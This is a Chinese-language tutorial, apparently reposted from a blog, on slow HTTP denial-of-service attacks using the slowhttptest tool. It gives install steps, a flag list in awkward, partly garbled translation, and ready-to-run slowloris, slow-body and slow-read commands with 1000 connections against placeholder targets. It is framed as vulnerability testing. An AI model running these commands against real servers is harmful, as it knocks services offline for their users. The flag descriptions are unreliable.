HTTP慢速攻击也叫slow http attack,是一种DoS攻击的方式。由于HTTP请求底层使用TCP网络连接进行会话,因此如果中间件对会话超时时间设置不合理,并且HTTP在发送请求的时候采用慢速发HTTP请求,就会导致占用一个HTTP连接会话。如果发送大量慢速的HTTP包就会导致拒绝服务攻击DoS。
使用工具:slowhttptest
SlowHTTPTest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者DDoS的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。slowhttptest包含了之前几种慢攻击的攻击方式,包括slowloris, Slow HTTP POST, Slow Read attack等。那么这些慢攻击工具的原理就是想办法让服务器等待,当服务器在保持连接等待时,自然就消耗了资源。
Kali Linux:
apt-get install slowhttptest
其他Linux发行版:
./configure make sudo make install
-a 一开始开始值范围说明符用于范围头测试 -b 将字节限制的范围说明符用于范围头测试 -c 连接数限制为65539 -d proxy host:port用于指导所有流量通过web代理 -e proxy host:port端口用于指导只有探针交通通过web代理 -h,B,R或x 指定减缓在头部分或在消息体,- R 允许范围检验,使慢读测试- x -g 生成统计数据在CSV和HTML格式,模式是缓慢的xxx。csv / html,其中xxx是时间和日期 -i seconds秒间隔跟踪数据在几秒钟内,每个连接 -k 管道因子次数重复请求在同一连接慢读测试如果服务器支持HTTP管道内衬。 -l 在几秒钟内,秒测试时间 -n 秒间隔从接收缓冲区读取操作 -o 文件定义输出文件路径和/或名称,如果指定有效- g -p 秒超时等待HTTP响应在探头连接后,服务器被认为是不可访问的 -r seconds连接速度 -s 字节值的内容长度标题详细说明,如果指定- b -t verb自定义 -u URL目标URL,相同的格式键入浏览器,e。g https://host[:port]/ -v level冗长等级0 – 4的日志 -w 字节范围广告的窗口大小会选择从 -x 字节最大长度的跟踪数据结束 -y 字节范围广告的窗口大小会选择从 -z 字节从接收缓冲区读取字节与单一的read()操作
slowloris模式:
slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://yourtarget.com/index.html -x 24 -p 3
Slow Body攻击:
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.mywebsite.com -x 10 -p 3
Slow Read模式:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://yourtarget.com -p 5 -l 350 -e x.x.x.x:8080
1、当服务器可控,可以通过以下命令来确认是否存在该漏洞: pgrep http | wc -l 进程数量 netstat -antp | grep 443 |wc -l 网络连接数量 2、在攻击的时间段,服务无法正常访问则存在漏洞。
原文:https://www.cnblogs.com/endust/p/11960901.html